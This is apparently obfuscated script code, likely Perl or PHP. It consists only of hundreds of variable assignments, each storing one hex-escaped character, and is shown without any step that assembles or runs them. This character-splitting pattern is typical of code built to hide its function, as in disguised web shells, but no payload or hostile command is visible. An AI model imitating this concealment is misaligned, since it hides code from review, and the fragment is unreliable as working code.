$bijr346="\x24";
$bijr462="\x65";$bijr1347="\x67";$bijr1566="\x20";$bijr1204="\x0a";$bijr366="\x2c";$bijr789="\x3d";$bijr1529="\x20";$bijr964="\x31";$bijr156="\x79";$bijr694="\x3b";$bijr1455="\x7d";$bijr127="\x20";
$bijr565="\x69";$bijr1196="\x69";$bijr1264="\x69";$bijr1298="\x72";$bijr228="\x6d";$bijr1626="\x74";$bijr1571="\x6e";$bijr905="\x24";$bijr667="\x73";
$bijr838="\x5c";$bijr927="\x63";$bijr423="\x6f";$bijr39="\x28";$bijr79="\x61";$bijr370="\x62";
$bijr1332="\x29";$bijr999="\x5f";$bijr792="\x29";$bijr272="\x74";$bijr845="\x6e";$bijr1122="\x65";$bijr353="\x09";$bijr632="\x69";$bijr356="\x73";
$bijr233="\x24";$bijr1117="\x68";$bijr843="\x72";
$bijr12="\x20";
$bijr1275="\x61";$bijr1366="\x20";
$bijr113="\x76";$bijr456="\x20";
$bijr114="\x65";$bijr1558="\x20";$bijr1534="\x73";$bijr875="\x63";$bijr444="\x65";$bijr1284="\x5d";$bijr286="\x20";$bijr111="\x65";$bijr1497="\x79";$bijr1698="\x61";$bijr224="\x64";$bijr554="\x64";$bijr1175="\x0a";
$bijr1182="\x6a";$bijr1061="\x20";$bijr270="\x66";
$bijr414="\x0a";$bijr753="\x20";
$bijr492="\x65";$bijr352="\x09";
$bijr1325="\x72";$bijr1285="\x3b";$bijr458="\x6f";$bijr1177="\x09";$bijr528="\x74";$bijr808="\x61";
$bijr1302="\x5f";$bijr1672="\x63";
$bijr1227="\x40";$bijr1425="\x32";$bijr880="\x3b";$bijr1440="\x65";
$bijr923="\x09";$bijr175="\x79";$bijr1290="\x7d";$bijr1041="\x3b";
$bijr288="\x68";$bijr777="\x64";$bijr573="\x24";$bijr1493="\x20";
$bijr1510="\x74";
$bijr784="\x29";$bijr314="\x20";$bijr787="\x20";$bijr1008="\x22";$bijr1693="\x67";$bijr947="\x20";$bijr289="\x69";
$bijr592="\x72";$bijr1390="\x09";$bijr971="\x20";$bijr376="\x63";$bijr1179="\x79";$bijr1030="\x27";$bijr871="\x20";$bijr500="\x6f";$bijr378="\x64";
$bijr1329="\x28";
$bijr731="\x69";$bijr1218="\x3d";
$bijr517="\x0a";$bijr594="\x6e";$bijr1090="\x6f";$bijr200="\x29";$bijr97="\x41";$bijr1032="\x76";$bijr1472="\x72";$bijr1129="\x20";$bijr341="\x29";$bijr869="\x20";$bijr949="\x20";$bijr140="\x62";
$bijr188="\x20";$bijr380="\x2c";
$bijr895="\x6f";$bijr960="\x32";
$bijr1483="\x20";$bijr1215="\x24";$bijr1137="\x61";$bijr1147="\x09";$bijr1553="\x0a";$bijr1086="\x20";
$bijr744="\x24";$bijr1494="\x6f";
$bijr1516="\x65";$bijr1118="\x75";
$bijr486="\x20";$bijr892="\x24";$bijr361="\x63";$bijr478="\x65";$bijr1338="\x6d";$bijr922="\x0a";
$bijr41="\x29";$bijr1600="\x63";$bijr89="\x72";$bijr743="\x09";$bijr326="\x20";
$bijr1389="\x09";$bijr1314="\x79";$bijr52="\x73";
$bijr835="\x3d";$bijr668="\x70";$bijr707="\x2c";$bijr400="\x64";$bijr1084="\x72";$bijr1709="\x20";$bijr750="\x20";$bijr1654="\x6e";$bijr1595="\x70";$bijr1235="\x20";$bijr754="\x22";$bijr1349="\x3d";
$bijr269="\x6f";$bijr1139="\x29";$bijr652="\x20";$bijr898="\x20";$bijr925="\x24";$bijr424="\x6d";$bijr1150="\x72";$bijr660="\x6f";$bijr967="\x29";$bijr251="\x09";
$bijr1594="\x72";$bijr505="\x74";$bijr331="\x6e";$bijr771="\x6e";
$bijr1266="\x20";$bijr193="\x69";$bijr1523="\x6f";
$bijr429="\x73";$bijr1563="\x69";$bijr1465="\x69";$bijr203="\x40";$bijr610="\x20";$bijr474="\x23";$bijr1402="\x73";$bijr935="\x22";$bijr1589="\x65";$bijr909="\x5f";$bijr1243="\x24";$bijr1311="\x0a";$bijr588="\x64";
$bijr163="\x20";$bijr1360="\x28";
$bijr1613="\x3b";$bijr1648="\x65";$bijr30="\x67";$bijr739="\x29";$bijr1462="\x69";$bijr593="\x69";
$bijr245="\x6f";$bijr1045="\x09";$bijr526="\x79";$bijr665="\x3d";$bijr1708="\x6c";$bijr1623="\x3e";
$bijr1677="\x20";$bijr1357="\x6f";$bijr1486="\x61";$bijr1336="\x0a";$bijr7="\x70";$bijr1646="\x65";$bijr587="\x6e";
$bijr823="\x6e";$bijr1385="\x29";$bijr482="\x6f";
$bijr373="\x72";$bijr1702="\x6e";
$bijr1176="\x09";$bijr199="\x28";$bijr990="\x22";$bijr1044="\x0a";$bijr1618="\x6e";$bijr1418="\x74";$bijr372="\x74";$bijr173="\x09";$bijr194="\x70";$bijr1547="\x65";$bijr687="\x78";$bijr542="\x73";$bijr267="\x79";$bijr616="\x0a";$bijr1127="\x6d";$bijr759="\x69";$bijr794="\x0a";$bijr1015="\x24";$bijr1138="\x32";$bijr1149="\x6f";
$bijr538="\x65";$bijr195="\x74";$bijr850="\x22";$bijr1134="\x2c";$bijr1491="\x6f";$bijr235="\x2a";$bijr128="\x72";$bijr1080="\x72";$bijr1560="\x72";$bijr724="\x72";$bijr583="\x3d";$bijr1496="\x6c";$bijr1517="\x6e";$bijr274="\x65";$bijr773="\x28";$bijr1043="\x3b";$bijr988="\x3d";$bijr673="\x66";
$bijr1508="\x70";$bijr1557="\x73";$bijr1161="\x40";$bijr749="\x65";$bijr1667="\x24";$bijr1174="\x7b";$bijr120="\x6c";$bijr1071="\x6d";
$bijr768="\x20";$bijr1094="\x0a";$bijr1573="\x6e";$bijr1417="\x6e";$bijr1191="\x61";$bijr1614="\x0a";
$bijr31="\x20";$bijr1048="\x63";
$bijr1337="\x09";$bijr394="\x73";$bijr1287="\x09";$bijr442="\x20";
$bijr1017="\x63";$bijr263="\x61";$bijr577="\x5f";$bijr883="\x2b";$bijr1585="\x20";$bijr885="\x69";$bijr1489="\x20";$bijr312="\x6f";$bijr225="\x28";$bijr1249="\x2c";$bijr1679="\x3b";$bijr1106="\x68";
$bijr396="\x20";$bijr477="\x68";$bijr137="\x0a";
$bijr276="\x63";$bijr914="\x22";$bijr700="\x61";$bijr669="\x72";
$bijr1630="\x72";$bijr738="\x29";$bijr33="\x6e";$bijr748="\x64";$bijr1384="\x69";
$bijr296="\x6c";
$bijr1694="\x65";
$bijr878="\x70";$bijr1567="\x65";$bijr369="\x75";
$bijr61="\x68";
$bijr1248="\x6a";$bijr518="\x09";
$bijr419="\x72";$bijr1544="\x63";$bijr339="\x64";$bijr539="\x28";$bijr488="\x61";$bijr791="\x30";$bijr779="\x32";$bijr1651="\x74";$bijr1485="\x65";$bijr231="\x29";$bijr633="\x20";$bijr1400="\x3d";$bijr38="\x20";
$bijr1636="\x61";$bijr1629="\x6f";
$bijr866="\x20";$bijr957="\x6e";$bijr1710="\x24";$bijr1081="\x65";$bijr105="\x74";$bijr695="\x22";$bijr1116="\x73";$bijr1432="\x29";$bijr830="\x6f";$bijr629="\x3b";$bijr1004="\x2e";
$bijr1612="\x63";
$bijr1577="\x6c";$bijr213="\x20";$bijr732="\x70";$bijr1466="\x73";$bijr1546="\x64";$bijr340="\x65";$bijr1038="\x6d";
$bijr287="\x77";$bijr204="\x69";
$bijr1363="\x20";$bijr1490="\x79";$bijr833="\x20";$bijr406="\x20";
$bijr368="\x73";$bijr1637="\x72";$bijr1022="\x2e";$bijr717="\x5b";$bijr358="\x20";$bijr865="\x3b";
$bijr1315="\x20";$bijr1370="\x3b";$bijr663="\x20";$bijr956="\x61";
$bijr218="\x0a";$bijr1291="\x0a";$bijr1088="\x6d";$bijr162="\x65";$bijr62="\x6d";$bijr1042="\x22";$bijr24="\x6f";$bijr1027="\x24";$bijr348="\x29";$bijr828="\x6d";$bijr1413="\x22";$bijr1055="\x20";$bijr535="\x66";$bijr447="\x20";$bijr176="\x20";
$bijr1433="\x3b";$bijr912="\x6d";$bijr1165="\x3b";$bijr853="\x09";$bijr384="\x2c";$bijr1643="\x2d";$bijr1701="\x6f";
$bijr512="\x6c";$bijr1681="\x24";$bijr445="\x65";$bijr651="\x29";
$bijr751="\x2e";$bijr1653="\x6f";$bijr701="\x72";$bijr109="\x65";$bijr537="\x6c";$bijr238="\x65";$bijr889="\x0a";$bijr1039="\x65";
$bijr1509="\x75";$bijr1060="\x6c";$bijr590="\x73";$bijr1410="\x22";$bijr831="\x64";$bijr756="\x6e";$bijr184="\x0a";$bijr159="\x63";$bijr1395="\x69";$bijr658="\x6d";$bijr350="\x7b";$bijr1268="\x6a";$bijr1035="\x5f";
$bijr679="\x73";$bijr1278="\x24";$bijr487="\x63";
$bijr1269="\x5d";
$bijr1053="\x2e";$bijr255="\x75";$bijr165="\x20";$bijr1393="\x74";$bijr661="\x64";
$bijr250="\x0a";$bijr1671="\x0a";$bijr510="\x65";$bijr1364="\x24";
$bijr1350="\x20";$bijr460="\x20";$bijr1341="\x24";$bijr1409="\x28";
$bijr1669="\x63";$bijr656="\x09";$bijr278="\x61";$bijr1521="\x74";
$bijr1645="\x67";$bijr91="\x69";$bijr1625="\x65";$bijr232="\x25";$bijr1473="\x73";$bijr571="\x0a";$bijr1171="\x3b";$bijr299="\x74";$bijr402="\x78";$bijr977="\x7d";$bijr558="\x73";$bijr1066="\x61";$bijr115="\x64";$bijr1210="\x74";$bijr1460="\x74";$bijr141="\x20";$bijr1130="\x28";$bijr876="\x72";$bijr856="\x72";$bijr42="\x20";$bijr584="\x20";$bijr547="\x74";$bijr816="\x28";$bijr1005="\x24";$bijr1411="\x25";
$bijr1446="\x24";$bijr951="\x69";
$bijr1593="\x6f";$bijr148="\x72";$bijr129="\x65";
$bijr1054="\x3d";$bijr1233="\x69";$bijr674="\x28";$bijr223="\x6e";$bijr1407="\x74";$bijr1487="\x6e";$bijr6="\x2d";$bijr1025="\x22";$bijr241="\x72";$bijr622="\x28";$bijr110="\x73";$bijr1592="\x6d";$bijr1688="\x3b";$bijr70="\x6e";
$bijr65="\x0a";
$bijr625="\x20";$bijr924="\x09";$bijr908="\x72";$bijr855="\x6f";$bijr1317="\x6c";$bijr643="\x70";$bijr1674="\x6f";$bijr1267="\x24";$bijr1597="\x28";$bijr1442="\x75";$bijr252="\x23";
$bijr941="\x66";$bijr374="\x28";$bijr1156="\x24";$bijr1518="\x65";
$bijr991="\x5c";$bijr78="\x72";$bijr85="\x31";$bijr1437="\x0a";$bijr49="\x65";$bijr450="\x61";
$bijr240="\x65";$bijr202="\x20";$bijr222="\x61";$bijr806="\x75";
$bijr119="\x6c";$bijr796="\x7d";$bijr169="\x66";
$bijr522="\x68";$bijr1050="\x64";$bijr293="\x62";
$bijr1647="\x6e";$bijr1270="\x20";$bijr641="\x72";$bijr437="\x72";$bijr881="\x20";$bijr1239="\x20";$bijr1427="\x29";$bijr1323="\x74";
$bijr449="\x72";$bijr60="\x61";$bijr817="\x29";$bijr1503="\x23";$bijr1631="\x70";$bijr48="\x53";$bijr135="\x64";$bijr852="\x0a";$bijr829="\x63";$bijr1454="\x0a";$bijr1353="\x3b";
$bijr93="\x6e";$bijr13="\x50";
$bijr798="\x0a";$bijr1257="\x09";$bijr323="\x20";$bijr1476="\x65";$bijr1666="\x20";$bijr236="\x24";$bijr1098="\x0a";$bijr461="\x77";$bijr8="\x65";$bijr742="\x09";
$bijr569="\x30";$bijr139="\x75";$bijr1135="\x20";$bijr34="\x67";$bijr516="\x72";$bijr1344="\x72";$bijr976="\x09";$bijr1142="\x20";$bijr1169="\x24";$bijr227="\x69";$bijr1120="\x66";$bijr1627="\x61";$bijr886="\x29";$bijr1590="\x74";$bijr197="\x3d";$bijr872="\x24";$bijr1533="\x20";$bijr567="\x3d";$bijr317="\x69";$bijr1346="\x6e";
$bijr1375="\x3c";
$bijr2="\x6d";$bijr670="\x69";$bijr186="\x6d";$bijr551="\x40";$bijr1181="\x24";$bijr397="\x40";$bijr258="\x64";$bijr145="\x61";$bijr1359="\x20";$bijr989="\x20";
$bijr1394="\x72";$bijr472="\x0a";$bijr285="\x73";$bijr185="\x09";$bijr1283="\x69";$bijr1221="\x24";$bijr168="\x69";$bijr167="\x68";$bijr1514="\x20";$bijr1300="\x6e";
$bijr1504="\x20";$bijr10="\x72";
$bijr157="\x20";$bijr1327="\x6e";$bijr301="\x65";$bijr1463="\x73";$bijr330="\x65";$bijr1170="\x69";
$bijr319="\x3d";$bijr1288="\x7d";$bijr189="\x40";$bijr1475="\x76";$bijr631="\x24";$bijr818="\x20";$bijr1148="\x66";$bijr1458="\x23";$bijr697="\x20";$bijr322="\x3b";$bijr1265="\x2c";$bijr164="\x3d";
$bijr320="\x20";
$bijr1536="\x6e";$bijr124="\x66";$bijr1429="\x39";$bijr1608="\x74";$bijr498="\x20";$bijr357="\x68";
$bijr821="\x72";$bijr1091="\x64";$bijr1200="\x31";$bijr309="\x0a";$bijr398="\x69";
$bijr532="\x73";$bijr963="\x2b";$bijr363="\x69";$bijr775="\x61";$bijr1194="\x28";
$bijr617="\x09";$bijr509="\x64";$bijr1392="\x73";
$bijr997="\x61";$bijr208="\x78";$bijr1421="\x61";$bijr191="\x63";
$bijr638="\x23";$bijr693="\x22";$bijr51="\x61";
$bijr1356="\x66";$bijr529="\x65";$bijr491="\x72";$bijr386="\x31";$bijr1083="\x75";$bijr504="\x63";$bijr1451="\x6e";$bijr1539="\x20";$bijr1100="\x75";
$bijr974="\x3b";$bijr562="\x0a";$bijr1582="\x24";$bijr497="\x64";$bijr253="\x20";
$bijr1348="\x20";
$bijr1092="\x65";$bijr408="\x69";$bijr523="\x65";
$bijr981="\x6d";$bijr1076="\x0a";$bijr1155="\x20";$bijr1292="\x0a";$bijr1712="\x63";$bijr677="\x24";$bijr1023="\x3d";$bijr470="\x65";$bijr1252="\x69";$bijr1205="\x09";$bijr365="\x74";
$bijr714="\x78";$bijr182="\x30";$bijr708="\x20";$bijr1000="\x6e";$bijr217="\x0a";
$bijr745="\x6d";
$bijr305="\x72";$bijr54="\x69";$bijr699="\x76";$bijr29="\x6e";
$bijr216="\x3b";$bijr256="\x69";$bijr1537="\x63";
$bijr1228="\x24";$bijr1699="\x74";$bijr1682="\x63";
$bijr1294="\x73";$bijr1524="\x6e";
$bijr783="\x31";$bijr443="\x6b";$bijr1143="\x40";$bijr123="\x65";$bijr1578="\x20";$bijr95="\x23";$bijr1059="\x61";$bijr887="\x20";$bijr1535="\x69";$bijr696="\x2c";
$bijr1426="\x30";$bijr1211="\x20";$bijr1542="\x65";$bijr1443="\x72";
$bijr490="\x20";$bijr387="\x29";$bijr718="\x24";$bijr864="\x30";
$bijr1072="\x65";$bijr1391="\x24";$bijr1715="\x0a";$bijr1304="\x74";$bijr1189="\x28";$bijr918="\x69";$bijr433="\x70";
$bijr416="\x09";$bijr635="\x3d";$bijr936="\x5c";$bijr1661="\x69";$bijr1201="\x29";$bijr654="\x0a";$bijr1635="\x76";$bijr624="\x69";$bijr21="\x65";$bijr201="\x2c";$bijr1324="\x28";$bijr71="\x73";$bijr84="\x2d";
$bijr603="\x20";$bijr832="\x65";$bijr58="\x4b";$bijr1479="\x6f";$bijr364="\x70";$bijr1016="\x6d";$bijr67="\x20";$bijr650="\x69";
$bijr810="\x65";$bijr1689="\x0a";$bijr1453="\x3b";$bijr112="\x72";$bijr621="\x20";$bijr1655="\x22";
$bijr75="\x65";$bijr1403="\x70";$bijr1261="\x32";$bijr144="\x74";$bijr1552="\x65";$bijr219="\x09";
$bijr640="\x63";$bijr388="\x3b";$bijr431="\x72";$bijr1687="\x22";$bijr709="\x24";$bijr1167="\x2d";$bijr23="\x6d";$bijr626="\x3d";
$bijr454="\x6f";$bijr940="\x69";$bijr125="\x74";$bijr1224="\x0a";$bijr116="\x2c";$bijr1082="\x74";$bijr383="\x69";$bijr926="\x6d";$bijr1619="\x28";$bijr82="\x6f";$bijr15="\x72";$bijr1183="\x20";
$bijr761="\x20";$bijr1607="\x6e";$bijr1217="\x20";$bijr1040="\x27";$bijr706="\x65";$bijr627="\x20";$bijr452="\x6b";$bijr862="\x3d";
$bijr678="\x25";$bijr306="\x69";
$bijr271="\x20";
$bijr884="\x24";$bijr1192="\x6e";
$bijr1428="\x2b";$bijr325="\x69";$bijr441="\x2c";
$bijr1244="\x61";$bijr1634="\x24";$bijr1121="\x6c";$bijr585="\x72";
$bijr102="\x69";$bijr609="\x65";$bijr1085="\x6e";$bijr1584="\x63";$bijr811="\x20";$bijr907="\x61";$bijr1467="\x20";$bijr1128="\x79";
$bijr580="\x6d";$bijr475="\x20";$bijr582="\x20";$bijr16="\x6c";$bijr407="\x24";$bijr1606="\x69";
$bijr550="\x5c";$bijr1316="\x24";$bijr636="\x20";$bijr64="\x72";$bijr1610="\x24";$bijr246="\x6e";$bijr873="\x23";$bijr900="\x3d";
$bijr479="\x6d";$bijr1254="\x3b";$bijr1365="\x69";$bijr1641="\x6d";$bijr766="\x20";$bijr354="\x70";
$bijr389="\x0a";$bijr1125="\x0a";$bijr1474="\x69";$bijr1604="\x70";$bijr653="\x7b";$bijr171="\x3b";$bijr315="\x28";
$bijr809="\x74";
$bijr143="\x65";$bijr1605="\x72";$bijr1226="\x09";
$bijr863="\x20";
$bijr328="\x20";$bijr1326="\x61";$bijr215="\x29";$bijr417="\x23";
$bijr180="\x3d";$bijr347="\x69";$bijr1238="\x5d";$bijr1368="\x20";$bijr259="\x20";$bijr770="\x69";$bijr198="\x20";$bijr983="\x6f";$bijr1670="\x3b";$bijr946="\x69";$bijr1202="\x29";$bijr212="\x3d";$bijr933="\x3d";
$bijr1530="\x73";$bijr799="\x09";$bijr412="\x7d";$bijr774="\x72";$bijr814="\x61";$bijr1276="\x32";$bijr868="\x69";$bijr375="\x24";$bijr888="\x7b";$bijr741="\x0a";$bijr942="\x20";$bijr292="\x20";$bijr107="\x20";$bijr598="\x3b";$bijr265="\x72";$bijr1318="\x20";$bijr525="\x5f";$bijr332="\x67";$bijr132="\x72";$bijr1376="\x20";$bijr649="\x24";$bijr600="\x09";$bijr782="\x2b";
$bijr1006="\x69";$bijr527="\x61";$bijr1190="\x72";$bijr1371="\x20";$bijr311="\x66";$bijr921="\x3b";
$bijr1146="\x0a";
$bijr1361="\x6d";$bijr1527="\x6f";$bijr501="\x72";$bijr703="\x6e";$bijr719="\x69";$bijr324="\x24";$bijr1615="\x6f";$bijr1281="\x20";$bijr94="\x0a";$bijr1230="\x31";$bijr80="\x74";$bijr480="\x20";
$bijr1093="\x3b";$bijr1251="\x24";$bijr1397="\x67";
$bijr559="\x29";$bijr1700="\x69";
$bijr1168="\x2d";$bijr122="\x6c";$bijr280="\x61";$bijr1424="\x28";$bijr1343="\x74";$bijr1256="\x09";$bijr672="\x74";$bijr1459="\x20";$bijr533="\x68";$bijr422="\x64";$bijr1258="\x40";$bijr1014="\x09";$bijr1330="\x33";$bijr623="\x24";$bijr1068="\x5f";$bijr1208="\x65";$bijr867="\x24";$bijr757="\x22";$bijr92="\x6f";$bijr248="\x3b";$bijr1448="\x74";
$bijr729="\x63";$bijr1024="\x20";$bijr1306="\x69";
$bijr1649="\x72";
$bijr1380="\x20";
$bijr962="\x29";$bijr273="\x68";$bijr1193="\x64";$bijr1231="\x5b";$bijr1404="\x72";$bijr1481="\x65";
$bijr877="\x69";$bijr1293="\x0a";$bijr1601="\x29";$bijr1188="\x74";
$bijr920="\x22";$bijr221="\x72";
$bijr945="\x24";$bijr74="\x67";$bijr1515="\x67";$bijr713="\x65";$bijr1242="\x40";$bijr1587="\x20";$bijr20="\x64";$bijr1576="\x61";$bijr19="\x6f";$bijr181="\x20";
$bijr1676="\x65";$bijr736="\x69";$bijr379="\x65";$bijr1321="\x69";$bijr1675="\x73";$bijr1502="\x0a";$bijr760="\x66";$bijr728="\x73";$bijr1377="\x24";$bijr534="\x75";$bijr1229="\x61";$bijr1241="\x20";
$bijr896="\x64";$bijr209="\x65";$bijr929="\x64";$bijr705="\x6d";$bijr785="\x29";$bijr1141="\x3d";$bijr90="\x73";$bijr1436="\x7d";$bijr146="\x6d";$bijr469="\x6c";$bijr1415="\x20";$bijr827="\x24";$bijr548="\x2c";$bijr385="\x20";$bijr226="\x74";$bijr1383="\x24";$bijr1484="\x6d";$bijr283="\x65";
$bijr395="\x68";$bijr302="\x20";$bijr187="\x79";
$bijr138="\x73";$bijr1575="\x69";$bijr605="\x6d";
$bijr104="\x68";$bijr1110="\x79";$bijr133="\x73";$bijr637="\x24";$bijr954="\x28";$bijr1470="\x63";$bijr972="\x30";$bijr1401="\x20";$bijr172="\x0a";$bijr851="\x3b";$bijr1423="\x64";$bijr591="\x74";$bijr1358="\x72";$bijr1295="\x75";$bijr1492="\x75";$bijr666="\x20";
$bijr1704="\x0a";$bijr969="\x3d";
$bijr439="\x61";$bijr316="\x24";
$bijr841="\x76";
$bijr1422="\x6e";
$bijr14="\x65";$bijr37="\x65";
$bijr566="\x20";$bijr800="\x23";$bijr1352="\x22";$bijr1107="\x65";$bijr1706="\x76";$bijr903="\x5c";$bijr1507="\x6d";$bijr902="\x22";
$bijr1095="\x7d";
$bijr555="\x65";$bijr310="\x09";$bijr1213="\x66";$bijr747="\x6f";$bijr436="\x61";$bijr1007="\x2e";
$bijr1438="\x09";$bijr1691="\x2b";$bijr985="\x65";
$bijr1259="\x24";
$bijr118="\x61";$bijr463="\x20";$bijr602="\x79";$bijr780="\x30";$bijr1185="\x20";$bijr1469="\x65";$bijr619="\x6f";$bijr1052="\x20";$bijr3="\x6f";$bijr685="\x5c";$bijr1237="\x6a";
$bijr196="\x20";$bijr295="\x69";$bijr1628="\x6d";
$bijr733="\x74";$bijr418="\x20";$bijr712="\x64";
$bijr1034="\x72";$bijr1684="\x22";$bijr891="\x09";$bijr1616="\x70";$bijr1399="\x2e";$bijr915="\x2e";
$bijr427="\x65";
$bijr76="\x6e";$bijr965="\x29";$bijr229="\x65";$bijr544="\x72";$bijr508="\x6f";$bijr1642="\x65";$bijr1307="\x6e";$bijr239="\x6e";$bijr1551="\x7a";$bijr1074="\x22";$bijr1078="\x0a";$bijr1037="\x61";$bijr662="\x65";$bijr1367="\x3d";$bijr343="\x20";$bijr1471="\x75";$bijr536="\x66";
$bijr723="\x6f";$bijr1548="\x2d";$bijr1220="\x20";
$bijr822="\x69";$bijr237="\x67";$bijr177="\x24";$bijr1310="\x7b";$bijr1263="\x24";$bijr1279="\x6a";$bijr1408="\x66";$bijr994="\x2e";$bijr711="\x6e";
$bijr464="\x73";$bijr1362="\x79";$bijr297="\x64";$bijr1064="\x24";
$bijr1108="\x72";$bijr858="\x28";$bijr1028="\x63";
$bijr975="\x0a";$bijr859="\x24";$bijr1063="\x24";$bijr978="\x0a";$bijr0="\x23";
$bijr966="\x29";$bijr726="\x28";$bijr715="\x65";$bijr307="\x70";$bijr664="\x2e";$bijr1260="\x61";$bijr684="\x22";$bijr797="\x0a";$bijr55="\x61";
$bijr1512="\x20";
$bijr979="\x09";$bijr959="\x28";$bijr25="\x72";$bijr101="\x72";
$bijr1500="\x61";$bijr1588="\x6d";$bijr1464="\x20";$bijr786="\x29";$bijr362="\x72";$bijr1540="\x74";$bijr682="\x3d";$bijr393="\x75";$bijr1077="\x09";
$bijr59="\x72";
$bijr1236="\x24";$bijr847="\x6d";$bijr1705="\x65";
$bijr192="\x72";$bijr73="\x20";$bijr1282="\x24";$bijr382="\x24";$bijr473="\x09";
$bijr1031="\x24";$bijr952="\x6e";$bijr47="\x20";$bijr1049="\x6f";
$bijr812="\x65";$bijr857="\x20";$bijr1199="\x20";$bijr1="\x20";$bijr514="\x74";
$bijr467="\x66";$bijr496="\x6c";$bijr507="\x63";$bijr1319="\x3d";$bijr596="\x28";$bijr1273="\x40";$bijr1203="\x3b";
$bijr1158="\x20";$bijr1209="\x78";$bijr336="\x24";
$bijr1561="\x6f";
$bijr166="\x73";$bijr576="\x72";$bijr421="\x6e";$bijr1457="\x0a";
$bijr740="\x3b";$bijr1272="\x20";$bijr826="\x09";$bijr899="\x2e";
$bijr961="\x30";$bijr1703="\x3b";$bijr147="\x6f";$bijr716="\x73";
$bijr801="\x20";$bijr457="\x68";$bijr1658="\x0a";$bijr1019="\x64";$bijr904="\x24";$bijr686="\x5c";$bijr840="\x24";
$bijr1478="\x63";$bijr913="\x65";$bijr657="\x24";
$bijr1186="\x69";$bijr1289="\x0a";$bijr599="\x0a";$bijr986="\x20";
$bijr499="\x63";$bijr1099="\x73";
$bijr720="\x5d";$bijr1245="\x31";$bijr572="\x09";$bijr579="\x61";$bijr1274="\x24";$bijr937="\x6e";$bijr1018="\x6f";$bijr1632="\x68";$bijr1345="\x69";$bijr1555="\x20";$bijr1468="\x72";$bijr680="\x25";$bijr349="\x20";$bijr298="\x20";$bijr300="\x68";$bijr1673="\x6c";
$bijr403="\x65";$bijr161="\x64";$bijr1678="\x4f";$bijr659="\x63";
$bijr5="\x65";$bijr1374="\x20";$bijr1652="\x69";$bijr401="\x65";
$bijr613="\x22";$bijr648="\x2b";$bijr35="\x69";$bijr1664="\x20";$bijr476="\x74";$bijr1305="\x72";$bijr561="\x0a";$bijr1501="\x6e";$bijr155="\x6d";$bijr1447="\x73";
$bijr1111="\x61";$bijr381="\x20";$bijr615="\x3b";$bijr303="\x73";$bijr1234="\x2c";$bijr958="\x64";$bijr546="\x70";$bijr377="\x6f";$bijr996="\x76";$bijr1010="\x22";$bijr134="\x65";$bijr595="\x67";$bijr540="\x5c";$bijr879="\x74";$bijr1602="\x3b";
$bijr854="\x66";$bijr446="\x70";
$bijr692="\x5c";
$bijr634="\x3c";$bijr1322="\x6e";
$bijr1057="\x65";$bijr553="\x6e";
$bijr688="\x25";$bijr117="\x20";$bijr1522="\x69";$bijr1373="\x69";$bijr970="\x3d";
$bijr234="\x24";$bijr1430="\x37";
$bijr618="\x66";$bijr1351="\x22";$bijr982="\x63";$bijr943="\x28";$bijr1680="\x0a";$bijr1354="\x0a";$bijr734="\x5b";
$bijr103="\x67";$bijr207="\x65";
$bijr321="\x30";$bijr1525="\x73";$bijr825="\x0a";$bijr1286="\x0a";$bijr1569="\x70";$bijr179="\x20";$bijr1396="\x6e";$bijr1154="\x79";
$bijr1650="\x61";$bijr778="\x28";$bijr1197="\x20";$bijr284="\x72";
$bijr1685="\x6e";
$bijr834="\x2e";$bijr390="\x09";$bijr1586="\x3d";$bijr264="\x72";$bijr758="\x20";$bijr1070="\x61";$bijr1342="\x73";$bijr468="\x66";$bijr953="\x74";
$bijr1123="\x0a";$bijr1187="\x6e";$bijr644="\x74";$bijr604="\x24";$bijr367="\x20";$bijr702="\x5f";$bijr1562="\x77";$bijr1369="\x30";$bijr721="\x2c";$bijr1001="\x61";$bijr1441="\x74";$bijr874="\x73";$bijr1435="\x09";$bijr266="\x61";$bijr1420="\x72";$bijr948="\x25";$bijr1152="\x28";$bijr1033="\x61";
$bijr371="\x73";$bijr495="\x69";$bijr130="\x76";$bijr1140="\x20";$bijr351="\x0a";$bijr805="\x63";$bijr1131="\x24";$bijr1382="\x2b";$bijr329="\x6c";$bijr568="\x20";$bijr4="\x72";$bijr1668="\x6e";$bijr1301="\x64";$bijr1506="\x6f";
$bijr541="\x40";$bijr335="\x28";$bijr455="\x6e";$bijr608="\x64";$bijr1381="\x2b";$bijr645="\x3b";$bijr1644="\x24";$bijr205="\x6e";$bijr1105="\x73";$bijr337="\x63";$bijr511="\x20";$bijr844="\x5f";$bijr1505="\x63";$bijr1309="\x0a";$bijr1145="\x3b";$bijr1378="\x6c";$bijr26="\x70";$bijr294="\x75";$bijr846="\x61";$bijr391="\x09";$bijr993="\x22";$bijr28="\x69";
$bijr1452="\x67";$bijr410="\x0a";$bijr434="\x74";$bijr420="\x61";$bijr334="\x68";$bijr788="\x3d";
$bijr72="\x74";$bijr86="\x20";$bijr36="\x6e";
$bijr752="\x3d";$bijr426="\x7a";
$bijr53="\x74";$bijr1320="\x20";$bijr1583="\x6e";
$bijr392="\x70";$bijr411="\x09";$bijr950="\x28";$bijr1079="\x09";$bijr530="\x73";$bijr1372="\x24";$bijr1328="\x64";$bijr727="\x24";$bijr126="\x73";$bijr1461="\x68";$bijr1545="\x6f";
$bijr327="\x3c";$bijr1119="\x66";
$bijr1073="\x3b";$bijr1047="\x6d";$bijr1335="\x3b";$bijr333="\x74";$bijr1159="\x3d";$bijr1206="\x09";
$bijr1488="\x73";$bijr142="\x6d";$bijr290="\x63";
$bijr1692="\x24";$bijr710="\x69";$bijr1528="\x72";$bijr1104="\x69";$bijr1157="\x69";$bijr27="\x68";$bijr190="\x73";
$bijr506="\x20";$bijr471="\x64";
$bijr247="\x29";$bijr158="\x24";$bijr170="\x74";
$bijr524="\x72";$bijr1124="\x7b";$bijr543="\x63";
$bijr630="\x20";
$bijr1178="\x6d";$bijr1599="\x24";$bijr1339="\x79";$bijr1299="\x61";
$bijr973="\x29";$bijr620="\x72";$bijr804="\x6c";$bijr106="\x73";
$bijr342="\x3b";$bijr88="\x65";$bijr1113="\x65";$bijr81="\x69";$bijr451="\x63";$bijr1162="\x24";$bijr1686="\x63";
$bijr698="\x24";$bijr574="\x76";$bijr493="\x62";
$bijr1331="\x29";$bijr1659="\x70";$bijr995="\x24";
$bijr1222="\x6a";$bijr519="\x66";$bijr262="\x20";
$bijr136="\x2e";$bijr790="\x20";$bijr279="\x72";$bijr69="\x6f";
$bijr1620="\x4f";
$bijr556="\x78";$bijr1303="\x73";$bijr1058="\x76";
